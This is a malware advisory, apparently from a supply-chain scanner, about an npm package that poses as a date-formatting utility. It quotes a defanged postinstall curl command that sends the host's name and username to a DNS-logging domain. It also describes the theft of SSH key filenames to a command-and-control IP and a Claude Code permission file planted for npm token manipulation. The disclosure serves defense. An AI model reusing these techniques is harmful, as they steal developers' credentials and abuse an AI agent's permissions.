LWA-2026-4981 MAL-2026-5729 ↗ confirmed malware

houzidawang806@1.0.1

Malicious code in houzidawang806 (npm)

T1195.002 · Compromise Software Supply ChainT1059.004 · Unix ShellT1082 · System Information DiscoveryT1552.004 · Private KeysT1071.001 · Web ProtocolsT1041 · Exfiltration Over C2 Channel

Analysis

This package is disguised as a date-formatting utility but delivers a credential-theft implant. Its postinstall hook runs `curl hxxp://275e856d[.]log[.]dnslog[.]pp[.]ua/pre?h=$(hostname)&u=$(whoami)`, beaconing the installer's hostname and username to a DNS-logging domain. Its bundled postinstall.js reads ~/.ssh directory contents for private-key filenames, scrapes os.userInfo() (username, platform), and POSTs the stolen data to C2 at IP 124[.]221[.]154[.]135 over HTTPS. A `.claude/settings.local.json` file grants Claude Code permission to run `PowerShell(npm config *)`, enabling npm token manipulation. The index.js exports a trivial formatDate function as a decoy.

analyzed by
Leitwacht
first seen
Jun 13, 2026, 04:24 AM
analyzed
Jun 13, 2026, 04:25 AM

Related advisories

browse all confirmed advisories →

Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.